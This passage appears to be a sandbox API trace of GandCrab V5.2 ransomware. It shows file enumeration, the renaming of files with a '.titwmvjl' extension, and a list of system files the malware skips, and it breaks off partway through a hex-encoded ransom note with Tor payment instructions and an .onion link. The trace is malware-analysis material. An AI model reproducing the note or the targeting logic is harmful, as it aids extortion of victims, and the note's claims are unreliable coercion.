[0067.499] VirtualFree (lpAddress=0x2610000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0067.499] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0067.500] FindNextFileW (in: hFindFile=0x4c9cf8, lpFindFileData=0x259fce0 | out: lpFindFileData=0x259fce0) returned 1 [0067.500] lstrcmpW (lpString1="BOOTNXT", lpString2=".") returned 1 [0067.500] lstrcmpW (lpString1="BOOTNXT", lpString2="..") returned 1 [0067.500] lstrcatW (in: lpString1="C:\\", lpString2="BOOTNXT" | out: lpString1="C:\\BOOTNXT") returned="C:\\BOOTNXT" [0067.500] lstrlenW (lpString=".titwmvjl") returned 9 [0067.500] lstrlenW (lpString="C:\\BOOTNXT") returned 10 [0067.500] VirtualAlloc (lpAddress=0x0, dwSize=0x54, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0067.500] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\BOOTNXT.titwmvjl") returned 19 [0067.500] lstrlenW (lpString="C:\\BOOTNXT") returned 10 [0067.500] lstrlenW (lpString="C:\\BOOTNXT") returned 10 [0067.500] lstrlenW (lpString="C:\\BOOTNXT") returned 10 [0067.500] lstrcmpiW (lpString1="BOOTNXT", lpString2="desktop.ini") returned -1 [0067.500] lstrcmpiW (lpString1="BOOTNXT", lpString2="autorun.inf") returned 1 [0067.500] lstrcmpiW (lpString1="BOOTNXT", lpString2="ntuser.dat") returned -1 [0067.500] lstrcmpiW (lpString1="BOOTNXT", lpString2="iconcache.db") returned -1 [0067.500] lstrcmpiW (lpString1="BOOTNXT", lpString2="bootsect.bak") returned -1 [0067.500] lstrcmpiW (lpString1="BOOTNXT", lpString2="boot.ini") returned 1 [0067.500] lstrcmpiW (lpString1="BOOTNXT", lpString2="ntuser.dat.log") returned -1 [0067.500] lstrcmpiW (lpString1="BOOTNXT", lpString2="thumbs.db") returned -1 [0067.500] lstrcmpiW (lpString1="BOOTNXT", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0067.500] lstrcmpiW (lpString1="BOOTNXT", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0067.500] lstrcmpiW (lpString1="BOOTNXT", lpString2="KRAB-DECRYPT.html") returned -1 [0067.500] lstrcmpiW (lpString1="BOOTNXT", lpString2="CRAB-DECRYPT.html") returned -1 [0067.500] lstrcmpiW (lpString1="BOOTNXT", lpString2="KRAB-DECRYPT.txt") returned -1 [0067.500] lstrcmpiW (lpString1="BOOTNXT", lpString2="CRAB-DECRYPT.txt") returned -1 [0067.500] lstrcmpiW (lpString1="BOOTNXT", lpString2="ntldr") returned -1 [0067.500] lstrcmpiW (lpString1="BOOTNXT", lpString2="NTDETECT.COM") returned -1 [0067.500] lstrcmpiW (lpString1="BOOTNXT", lpString2="Bootfont.bin") returned 1 [0067.500] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0067.501] FindNextFileW (in: hFindFile=0x4c9cf8, lpFindFileData=0x259fce0 | out: lpFindFileData=0x259fce0) returned 1 [0067.501] lstrcmpW (lpString1="BOOTSECT.BAK", lpString2=".") returned 1 [0067.501] lstrcmpW (lpString1="BOOTSECT.BAK", lpString2="..") returned 1 [0067.501] lstrcatW (in: lpString1="C:\\", lpString2="BOOTSECT.BAK" | out: lpString1="C:\\BOOTSECT.BAK") returned="C:\\BOOTSECT.BAK" [0067.501] lstrlenW (lpString=".titwmvjl") returned 9 [0067.501] lstrlenW (lpString="C:\\BOOTSECT.BAK") returned 15 [0067.501] VirtualAlloc (lpAddress=0x0, dwSize=0x5e, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0067.501] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\BOOTSECT.BAK.titwmvjl") returned 24 [0067.501] lstrlenW (lpString="C:\\BOOTSECT.BAK") returned 15 [0067.501] lstrlenW (lpString=".BAK") returned 4 [0067.501] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2610000 [0067.501] wsprintfW (in: param_1=0x2610000, param_2="%ws " | out: param_1=".BAK ") returned 5 [0067.501] lstrcmpiW (lpString1=".BAK", lpString2=".titwmvjl") returned -1 [0067.501] VirtualFree (lpAddress=0x2610000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0067.501] lstrlenW (lpString="C:\\BOOTSECT.BAK") returned 15 [0067.501] lstrlenW (lpString="C:\\BOOTSECT.BAK") returned 15 [0067.501] lstrcmpiW (lpString1="BOOTSECT.BAK", lpString2="desktop.ini") returned -1 [0067.501] lstrcmpiW (lpString1="BOOTSECT.BAK", lpString2="autorun.inf") returned 1 [0067.501] lstrcmpiW (lpString1="BOOTSECT.BAK", lpString2="ntuser.dat") returned -1 [0067.501] lstrcmpiW (lpString1="BOOTSECT.BAK", lpString2="iconcache.db") returned -1 [0067.501] lstrcmpiW (lpString1="BOOTSECT.BAK", lpString2="bootsect.bak") returned 0 [0067.501] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0067.502] FindNextFileW (in: hFindFile=0x4c9cf8, lpFindFileData=0x259fce0 | out: lpFindFileData=0x259fce0) returned 1 [0067.502] lstrcmpW (lpString1="Config.Msi", lpString2=".") returned 1 [0067.502] lstrcmpW (lpString1="Config.Msi", lpString2="..") returned 1 [0067.502] lstrcatW (in: lpString1="C:\\", lpString2="Config.Msi" | out: lpString1="C:\\Config.Msi") returned="C:\\Config.Msi" [0067.502] lstrcatW (in: lpString1="C:\\Config.Msi", lpString2="\\" | out: lpString1="C:\\Config.Msi\\") returned="C:\\Config.Msi\\" [0067.502] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x25d0000 [0067.502] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0067.502] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0067.502] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0067.502] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0067.502] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0067.502] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0067.503] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0067.503] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0067.503] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0067.503] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0067.503] wsprintfW (in: param_1=0x25d0200, param_2="%s\\%s-DECRYPT.txt" | out: param_1="C:\\Config.Msi\\\\TITWMVJL-DECRYPT.txt") returned 35 [0067.503] CreateFileW (lpFileName="C:\\Config.Msi\\\\TITWMVJL-DECRYPT.txt" (normalized: "c:\\config.msi\\titwmvjl-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x218 [0067.504] lstrlenW (lpString="\xfeff\x2d\x2d\x2d\x3d\x20\x20\x20\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x56\x35\x2e\x32\x20\x20\x20\x20\x3d\x2d\x2d\x2d\x20\x0d\x0a\x0d\x0a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x55\x4e\x44\x45\x52\x20\x4e\x4f\x20\x43\x49\x52\x43\x55\x4d\x53\x54\x41\x4e\x43\x45\x53\x20\x44\x4f\x20\x4e\x4f\x54\x20\x44\x45\x4c\x45\x54\x45\x20\x54\x48\x49\x53\x20\x46\x49\x4c\x45\x2c\x20\x55\x4e\x54\x49\x4c\x20\x41\x4c\x4c\x20\x59\x4f\x55\x52\x20\x44\x41\x54\x41\x20\x49\x53\x20\x52\x45\x43\x4f\x56\x45\x52\x45\x44\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x09\x2a\x2a\x2a\x2a\x2a\x46\x41\x49\x4c\x49\x4e\x47\x20\x54\x4f\x20\x44\x4f\x20\x53\x4f\x2c\x20\x57\x49\x4c\x4c\x20\x52\x45\x53\x55\x4c\x54\x20\x49\x4e\x20\x59\x4f\x55\x52\x20\x53\x59\x53\x54\x45\x4d\x20\x43\x4f\x52\x52\x55\x50\x54\x49\x4f\x4e\x2c\x20\x49\x46\x20\x54\x48\x45\x52\x45\x20\x41\x52\x45\x20\x44\x45\x43\x52\x59\x50\x54\x49\x4f\x4e\x20\x45\x52\x52\x4f\x52\x53\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x41\x74\x74\x65\x6e\x74\x69\x6f\x6e\x21\x20\x0d\x0a\x0d\x0a\x41\x6c\x6c\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2c\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x73\x2c\x20\x70\x68\x6f\x74\x6f\x73\x2c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x73\x20\x61\x6e\x64\x20\x6f\x74\x68\x65\x72\x20\x69\x6d\x70\x6f\x72\x74\x61\x6e\x74\x20\x66\x69\x6c\x65\x73\x20\x61\x72\x65\x20\x65\x6e\x63\x72\x79\x70\x74\x65\x64\x20\x61\x6e\x64\x20\x68\x61\x76\x65\x20\x74\x68\x65\x20\x65\x78\x74\x65\x6e\x73\x69\x6f\x6e\x3a\x20\x2e\x54\x49\x54\x57\x4d\x56\x4a\x4c\x20\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x6f\x6e\x6c\x79\x20\x6d\x65\x74\x68\x6f\x64\x20\x6f\x66\x20\x72\x65\x63\x6f\x76\x65\x72\x69\x6e\x67\x20\x66\x69\x6c\x65\x73\x20\x69\x73\x20\x74\x6f\x20\x70\x75\x72\x63\x68\x61\x73\x65\x20\x61\x6e\x20\x75\x6e\x69\x71\x75\x65\x20\x70\x72\x69\x76\x61\x74\x65\x20\x6b\x65\x79\x2e\x20\x4f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x67\x69\x76\x65\x20\x79\x6f\x75\x20\x74\x68\x69\x73\x20\x6b\x65\x79\x20\x61\x6e\x64\x20\x6f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x72\x65\x63\x6f\x76\x65\x72\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2e\x0d\x0a\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x73\x65\x72\x76\x65\x72\x20\x77\x69\x74\x68\x20\x79\x6f\x75\x72\x20\x6b\x65\x79\x20\x69\x73\x20\x69\x6e\x20\x61\x20\x63\x6c\x6f\x73\x65\x64\x20\x6e\x65\x74\x77\x6f\x72\x6b\x20\x54\x4f\x52\x2e\x20\x59\x6f\x75\x20\x63\x61\x6e\x20\x67\x65\x74\x20\x74\x68\x65\x72\x65\x20\x62\x79\x20\x74\x68\x65\x20\x66\x6f\x6c\x6c\x6f\x77\x69\x6e\x67\x20\x77\x61\x79\x73\x3a\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x7c\x20\x30\x2e\x20\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x2d\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x74\x6f\x72\x70\x72\x6f\x6a\x65\x63\x74\x2e\x6f\x72\x67\x2f\x20\x0d\x0a\x0d\x0a\x7c\x20\x31\x2e\x20\x49\x6e\x73\x74\x61\x6c\x6c\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x32\x2e\x20\x4f\x70\x65\x6e\x20\x54\x6f\x72\x20\x42\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x33\x2e\x20\x4f\x70\x65\x6e\x20\x6c\x69\x6e\x6b\x20\x69\x6e\x20\x54\x4f\x52\x20\x62\x72\x6f\x77\x73\x65\x72\x3a\x20\x20\x20\x68\x74\x74\x70\x3a\x2f\x2f\x67\x61\x6e\x64\x63\x72\x61\x62\x6d\x66\x65\x36\x6d\x6e\x65\x66\x2e\x6f\x6e\x69\x6f\x6e\x2f\x39\x39\x38\x61\x32\x66\x34\x35\x64\x32\x63\x61\x34\x64\x65\x66\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x7c\x20\x34\x2e\x20\x46\x6f\x6c\x6c\x6f\x77\x20\x74\x68\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x74\x68\x69\x73\x20\x70\x61\x67\x65\x20\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x4f\x6e\x20\x6f\x75\x72\x20\x70\x61\x67\x65\x20\x79\x6f\x75\x20\x77\x69\x6c\x6c\x20\x73\x65\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x70\x61\x79\x6d\x65\x6e\x74\x20\x61\x6e\x64\x20\x67\x65\x74\x20\x74\x68\x65\x20\x6f\x70\x70\x6f\x72\x74\x75\x6e\x69\x74\x79\x20\x74\x6f\x20\x64\x65\x63\x72\x79\x70\x74\x20\x31\x20\x66\x69\x6c\x65\x20\x66\x6f\x72\x20\x66\x72\x65\x65\x2e\x20\x0d\x0a\x0d\x0a\x0d\x0a\x41\x54\x54\x45\x4e\x54\x49\x4f\x4e\x21\x0d\x0a\x0d\x0a\x49\x4e\x20\x4f\x52\x44\x45\x52\x20\x54\x4f\x20\x50\x52\x45\x56\x45\x4e\x54\x20\x44\x41\x54\x41\x20\x44\x41\x4d\x41\x47\x45\x3a\x0d\x0a\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x4d\x4f\x44\x49\x46\x59\x20\x45\x4e\x43\x52\x59\x50\x54\x45\x44\x20\x46\x49\x4c\x45\x53\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x43\x48\x41\x4e\x47\x45\x20\x44\x41\x54\x41\x20\x42\x45\x4c\x4f\x57\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x6c\x41\x51\x41\x41\x42\x42\x6a\x58\x74\x68\x4a\x35\x51\x30\x77\x50\x44\x4f\x69\x52\x2f\x55\x55\x71\x42\x6a\x71\x4e\x47\x47\x52\x4d\x53\x45\x54\x66\x6e\x4b\x46\x4e\x2f\x77\x43\x30\x5a\x32\x79\x38\x75\x58\x4e\x4b\x2f\x63\x51\x52\x78\x51\x2b\x75\x78\x6a\x76\x48\x59\x6f\x52\x4e\x57\x4b\x4f\x77\x79\x70\x66\x53\x6e\x77\x69\x73\x61\x7a\x66\x6f\x32\x49\x75\x35\x76\x57\x57\x2b\x52\x43\x6b\x47\x47\x42\x31\x47\x6e\x65\x73\x51\x6b\x51\x77\x75\x54\x32\x41\x5a\x78\x56\x78\x35\x51\x59\x34\x69\x65\x2b\x6c\x65\x57\x2f\x4d\x5a\x41\x77\x47\x50\x70\x7a\x38\x2f\x37\x64\x5a\x77\x6f\x4c\x2b\x55\x71\x71\x4f\x77\x4d\x70\x54\x47\x33\x2b\x41\x6e\x76\x45\x51\x33\x4c\x4d\x6e\x49\x69\x51\x63\x70\x34\x48\x44\x66\x64\x33\x38\x4d\x50\x52\x43\x73\x52\x36\x67\x71\x63\x49\x48\x6f\x42\x70\x55\x4c\x77\x43\x33\x47\x6d\x37\x78\x7a\x74\x5a\x42\x69\x48\x47\x5a\x67\x5a\x56\x37\x4c\x6e\x61\x67\x51\x6b\x72\x4f\x41\x6c\x77\x54\x31\x36\x69\x70\x71\x4c\x31\x7a\x58\x54\x34\x6b\x4f\x79\x47\x45\x5a\x4c\x53\x6c\x71\x36\x48\x52\x57\x72\x52\x4a\x6b\x59\x53\x51\x35\x7a\x4c\x74\x50\x31\x54\x6b\x34\x68\x6d\x6d\x42\x51\x31\x66\x6f\x6a\x57\x46\x72\x63\x6f\x54\x34\x36\x78\x63\x76\x57\x2b\x33\x53\x33\x30\x6e\x56\x30\x46\x43\x51\x59\x64\x6a\x35\x68\x48\x66\x62\x50\x6c\x62\x4f\x52\x5a\x72\x69\x34\x6e\x2b\x65\x55\x43\x49\x6c\x46\x31\x74\x4b\x78\x62\x45\x69\x51\x74\x4a\x4e\x74\x66\x66\x74\x31\x76\x6b\x59\x31\x62\x6e\x78\x49\x64\x74\x45\x74\x57\x62\x49\x4e\x77\x6c\x75\x6e\x2f\x31\x39\x37\x67\x4f\x72\x72\x49\x58\x4a\x2b\x45\x70\x37\x61\x31\x73\x34\x68\x41\x54\x32\x6b\x45\x6b\x6d\x31\x48\x55\x4e\x39\x39\x46\x55\x4d\x7a\x2b\x49\x73\x51\x45\x4b\x35\x41\x44\x59\x6d\x35\x4a\x73\x42\x55\x61\x63\x59\x6c\x58\x52\x65\x77\x77\x78\x4e\x41\x55\x67\x6b\x77\x54\x51\x31\x69\x78\x57\x48\x63\x68\x36\x4c\x4e\x66\x6f\x46\x62\x78\x2f\x59\x30\x51\x67\x6c\x59\x47\x6c\x37\x36\x62\x4c\x67\x6c\x6a\x67\x6c\x50\x69\x61\x72\x2b\x46\x4d\x6d\x73\x4a\x6b\x48\x44\x78\x58\x46\x41\x64\x70\x56\x50\x4d\x4b\x54\x2b\x50\x70\x63\x6e\x32\x67\x31\x52\x65\x6f\x6d\x79\x5a\x73\x41\x77\x33\x30\x68\x4e\x4d\x79\x59\x43\x74\x79\x7a\x59\x56\x6d\x51\x7a\x4e\x56\x56\x77\x65\x76\x4d\x6b\x70\x71\x33\x44\x66\x76\x30\x76\x48\x65\x43\x6a\x58\x63\x30\x71\x67\x72\x38\x48\x53\x78\x6f\x57\x53\x6c\x56\x42\x7a\x55\x4c\x72\x47\x64\x77\x71\x7a\x61\x62\x59\x79\x6f\x72\x78\x32\x77\x62\x32\x6c\x50\x71\x6e\x43\x73\x4c\x2f\x59\x4f\x74\x63\x72\x69\x65\x50\x62\x77\x73\x57\x59\x46\x5a\x51\x47\x46\x63\x31\x4a\x6f\x71\x4a\x4a\x5a\x35\x4a\x74\x74\x4a\x35\x31\x45\x4c\x44\x52\x43\x4e\x4d\x44\x68\x74\x5a\x76\x42\x66\x61\x49\x7a\x65\x39\x54\x5a\x4c\x52\x61\x43\x42\x69\x30\x4d\x4a\x68\x54\x57\x30\x38\x74\x63\x66\x54\x6f\x62\x4a\x76\x4a\x30\x4d\x39\x34\x56\x62\x51\x44\x76\x2b\x4e\x51\x37\x6e\x6b\x78\x69\x35\x53\x33\x38\x67\x32\x46\x72\x4d\x38\x48\x75\x66\x71\x71\x49\x34\x5a\x67\x4c\x6f\x71\x43\x74\x45\x5a\x44\x67\x69\x62\x74\x42\x77\x51\x7a\x6d\x77\x30\x55\x2b\x64\x2f\x66\x69\x6d\x4d\x4e\x57\x66\x77\x4f\x55\x35\x65\x36\x77\x50\x4e\x6a\x50\x48\x5a\x6a\x73\x57\x38\x2f\x34\x48\x66\x30\x66\x67\x58\x41\x76\x42\x32\x2b\x67\x6b\x76\x52\x73\x75\x48\x53\x69\x75\x57\x53\x30\x5a\x78\x7a\x2f\x41\x42\x33\x4e\x69\x47\x4f\x64\x5a\x50\x64\x78\x72\x71\x4b\x71\x59\x49\x42\x4f\x6b\x4b\x35\x47\x48\x36\x6e\x39\x31\x51\x69\x74\x2f\x43\x66\x46\x66\x4e\x43\x68\x51\x59\x79\x73\x59\x48\x69\x45\x55\x31\x6d\x43\x4a\x2f\x46\x2f\x42\x6d\x65\x4a\x79\x37\x74\x41\x30\x55\x72\x62\x72\x6f\x4c\x53\x66\x45\x74\x7a\x53\x78\x63\x36\x4e\x73\x54\x48\x41\x65\x65\x6d\x48\x6e\x4e\x77\x38\x6d\x4c\x56\x41\x70\x52\x6e\x68\x50\x42\x36\x73\x36\x69\x5a\x66\x59\x6b\x62\x6f\x44\x4c\x45\x37\x64\x72\x56\x44\x6c\x52\x72\x66\x7a\x62\x6f\x63\x31\x56\x6e\x47\x76\x46\x66\x46\x42\x66\x2b\x5a\x37\x6b\x2b\x57\x55\x76\x6b\x6b\x68\x63\x41\x43\x5a\x69\x4b\x74\x6c\x50\x62\x70\x35\x34\x53\x2f\x73\x2b\x55\x73\x6d\x4e\x48\x6a\x55\x4e\x52\x36\x44\x78\x53\x49\x32\x31\x75\x61\x45\x50\x32\x4d\x30\x71\x75\x57\x53\x65\x46\x4a\x38\x77\x76\x61\x2b\x6e\x2f\x6c\x47\x35\x58\x75\x4c\x78\x4b\x4d\x59\x53\x44\x48\x4f\x61\x39\x79\x73\x34\x31\x48\x69\x51\x7a\x43\x33\x41\x33\x52\x67\x73\x2f\x78\x58\x4f\x74\x66\x4d\x31\x78\x6b\x56\x4d\x65\x6c\x5a\x78\x39\x64\x67\x6c\x6f\x66\x33\x34\x4a\x34\x47\x61\x6f\x45\x37\x53\x64\x34\x75\x41\x32\x6b\x79\x61\x4c\x76\x57\x62\x44\x43\x68\x55\x38\x5a\x46\x48\x48\x2b\x4c\x4f\x43\x66\x56\x41\x5a\x61\x48\x34\x55\x6e\x42\x65\x48\x63\x37\x68\x70\x36\x43\x53\x6a\x30\x4b\x77\x73\x31\x68\x30\x31\x46\x63\x58\x67\x74\x76\x6a\x43\x6e\x41\x70\x6a\x55\x37\x46\x72\x59\x53\x42\x43\x72\x77\x7a\x53\x73\x58\x4f\x55\x6b\x36\x41\x43\x34\x37\x41\x69\x56\x69\x48\x2f\x71\x45\x66\x42\x34\x44\x73\x66\x33\x72\x4e\x59\x38\x4a\x44\x62\x51\x54\x44\x72\x73\x57\x7a\x49\x39\x6f\x62\x71\x4e\x53\x4f\x46\x65\x2f\x4a\x4f\x73\x64\x4e\x4e\x56\x6c\x78\x39\x67\x51\x31\x79\x57\x59\x38\x4e\x65\x33\x51\x33\x76\x71\x62\x32\x61\x4e\x67\x6c\x67\x35\x2b\x6d\x6e\x66\x72\x4f\x50\x62\x51\x4a\x33\x66\x36\x53\x48\x79\x52\x53\x63\x68\x6f\x44\x72\x4a\x66\x7a\x38\x43\x69\x78\x75\x39\x53\x6b\x39\x38\x44\x59\x57\x66\x6a\x6e\x73\x70\x75\x35\x59\x64\x2f\x50\x78\x47\x44\x32\x55\x4f\x62\x6b\x30\x62\x68\x65\x4d\x78\x68\x52\x69\x73\x42\x63\x39\x42\x63\x7a\x53\x4f\x4c\x2b\x36\x74\x6c\x65\x62\x68\x42\x6d\x54\x68\x38\x4c\x46\x61\x56\x6f\x6d\x4b\x31\x53\x38\x75\x7a\x74\x73\x68\x52\x56\x63\x4f\x4a\x68\x70\x37\x6f\x2b\x48\x56\x35\x64\x51\x54\x35\x77\x41\x4c\x53\x79\x4c\x36\x67\x4e\x52\x47\x6e\x4f\x6a\x35\x34\x58\x51\x36\x75\x35\x36\x48\x2f\x70\x6a\x63\x2b\x54\x4b\x6c\x59\x30\x61\x57\x52\x76\x38\x76\x65\x63\x59\x44\x52\x44\x48\x4c\x55\x6e\x45\x48\x41\x42\x4c\x46\x71\x4a\x50\x36\x58\x79\x64\x31\x48\x53\x57\x32\x36\x4b\x65\x74\x6a\x56\x37\x4b\x6e\x42\x49\x68\x39\x46\x5a\x68\x67\x6b\x61\x64\x68\x71\x4f\x57\x75\x55\x67\x66\x6f\x53\x6f\x62\x72\x32\x61\x4d\x37\x59\x4f\x6a\x67\x5a\x52\x68\x44\x69\x6e\x59\x62\x31\x73\x54\x49\x49\x77\x62\x6d\x63\x64\x6f\x55\x45\x45\x62\x6a\x4c\x50\x7a\x33\x35\x2f\x70\x44\x62\x33\x72\x4b\x2f\x6a\x65\x53\x62\x43\x61\x70\x43\x68\x33\x7a\x43\x66\x66\x48\x72\x31\x68\x39\x58\x59\x57\x4c\x37\x6f\x67\x6c\x4b\x31\x49\x79\x39\x53\x6e\x50\x7a\x72\x4e\x74\x77\x35\x69\x6e\x6e\x35\x67\x46\x2f\x54\x62\x32\x32\x2f\x64\x78\x34\x2b\x32\x53\x61\x55\x48\x50\x78\x54\x79\x70\x4f\x79\x6b\x62\x66\x6a\x72\x57\x7a\x4e\x79\x4e\x34\x74\x38\x54\x70\x4a\x6d\x6a\x64\x76\x6d\x31\x41\x6c\x38\x53\x54\x53\x51\x73\x76\x76\x52\x55\x37\x45\x43\x61\x52\x37\x6e\x4c\x32\x41\x64\x42\x4e\x36\x4a\x32\x6d\x35\x6a\x6d\x64\x78\x54\x5a\x79\x64\x77\x4a\x50\x6e\x36\x31\x63\x70\x46\x39\x6b\x71\x44\x77\x2f\x74\x76\x4c\x4f\x4c\x4a\x43\x43\x7a\x56\x32\x5a\x44\x48\x33\x4f\x49\x6d\x56\x75\x69\x6e\x67\x31\x6c\x31\x65\x62\x63\x65\x42\x53\x45\x6a\x6f\x36\x52\x61\x36\x7a\x67\x75\x31\x4d\x6a\x32\x63\x58\x39\x57\x4d\x77\x31\x50\x78\x30\x53\x64\x32\x6c\x4d\x75\x77\x6d\x51\x6b\x34\x30\x36\x4f\x49\x64\x4c\x64\x55\x64\x34\x67\x6c\x71\x66\x30\x55\x48\x72\x38\x64\x66\x47\x4a\x79\x66\x62\x61\x4a\x45\x4c\x63\x74\x56\x36\x67\x36\x2b\x6e\x35\x66\x44\x71\x36\x56\x51\x41\x30\x72\x78\x78\x74\x79\x76\x6b\x43\x74\x68\x6d\x52\x4c\x73\x54\x67\x66\x4f\x6f\x58\x65\x34\x47\x37\x68\x39\x69\x4e\x75\x65\x73\x6f\x4d\x72\x30\x50\x6f\x61\x38\x6b\x4a\x5a\x54\x56\x68\x66\x33\x77\x54\x2f\x75\x75\x79\x64\x4d\x79\x55\x70\x63\x6c\x53\x49\x6a\x71\x2b\x66\x55\x49\x52\x72\x2b\x37\x6b\x2f\x57\x39\x4f\x39\x56\x73\x79\x32\x4e\x63\x78\x35\x70\x66\x2b\x53\x2b\x4d\x72\x4c\x31\x41\x6d\x35\x52\x51\x69\x33\x63\x36\x78\x46\x65\x54\x78\x33\x4d\x63\x5a\x52\x38\x30\x6e\x56\x69\x6e\x68\x75\x59\x6c\x69\x52\x51\x68\x4b\x4e\x6f\x4e\x57\x49\x32\x67\x48\x61\x47\x36\x6c\x52\x75\x7a\x2b\x51\x68\x47\x30\x52\x70\x4d\x59\x62\x7a\x42\x67\x4f\x6a\x35\x68\x69\x2f\x63\x63\x79\x55\x79\x68\x4d\x35\x66\x55\x49\x67\x63\x4a\x31\x39\x6c\x50\x64\x63\x6d\x76\x69\x78\x47\x6c\x6b\x35\x52\x38\x72\x6b\x32\x5a\x66\x78\x68\x4a\x78\x72\x46\x49\x75\x4c\x51\x54\x73\x52\x72\x61\x69\x77\x63\x44\x4d\x54\x41\x6d\x39\x63\x38\x6b\x64\x72\x2f\x59\x66\x34\x51\x6e\x2b\x62\x76\x37\x79\x4a\x5a\x34\x59\x58\x67\x42\x38\x45\x64\x6c\x31\x58\x64\x53\x6e\x4d\x72\x55\x50\x56\x35\x6f\x72\x63\x42\x78\x33\x32\x65\x73\x48\x6c\